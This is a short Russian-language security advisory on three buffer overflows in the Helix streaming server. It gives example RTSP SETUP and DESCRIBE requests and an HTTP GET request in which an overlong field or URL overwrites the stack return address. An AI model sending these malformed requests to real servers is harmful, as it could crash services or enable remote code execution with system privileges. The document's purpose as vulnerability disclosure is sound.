Множественные переполнения буфера в Helix сервере

Сервер Helix использует RTSP протокол, который основан на HTTP протоколе.

1. Чрезмерно длинная строка символов внутри поля Transport в SETUP RSTP запросе, вызовет переполнение буфера с перезаписью сохраненного адреса возврата на стеке. На Windows системах, Helix сервер по умолчанию установлен как системная служба, в результате успешная эксплуатация уязвимости позволяет атакующему выполнять произвольные команды с системными привилегиями. На UNIX системах, воздействие уязвимости зависит от конкретных платформ. Пример:

   SETUP rtsp://www.ngsconsulting.com:554/real9video.rm RTSP/1.0
   CSeq: 302
   Transport: AAAAAAAAA-->
   

2. Снабжая очень длинный URL в поле Describe, на 554 порту, нападающий может перезаписать сохраненный адрес возврата, что может привести к выполнению произвольного кода. Пример:

   DESCRIBE rtsp://www.ngsconsulting.com:554/AAAAAAAA-->.smi RTSP/1.0
   CSeq: 2
   Accept: application/sdp
   Session: 4668-1
   Bandwidth: 393216
   ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
   Cookie: cbid=www.ngsconsulting.com
   GUID: 00000000-0000-0000-0000-000000000000
   Language: en-us
   PlayerCookie: cbid
   RegionData: myregion
   Require: com.real.retain-entity-for-setup
   SupportsMaximumASMBandwidth: 1
   
   

3. Два HTTP запроса (порт 80), содержащих одновременно длинные URL (в первом подключении система похоже зависает, сохраняя этот сеанс открытым, и делает новое подключение и снабжает снова тот же самый запрос), перезапишут сохраненный адрес возврата, позволяя атакующему выполнить произвольный код. Пример:

   GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0
   User-Agent: RealPlayer G2
   Expires: Mon, 18 May 1974 00:00:00 GMT
   Pragma: no-cache
   Accept: application/x-rtsp-tunnelled, */*
   ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
   Cookie:
   cbid=dfjgimiidjcfllgheokrqprqqojrptnpik
   cjkioigjdkfiplqniomprtkronoqmuekigihd
   i
   X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt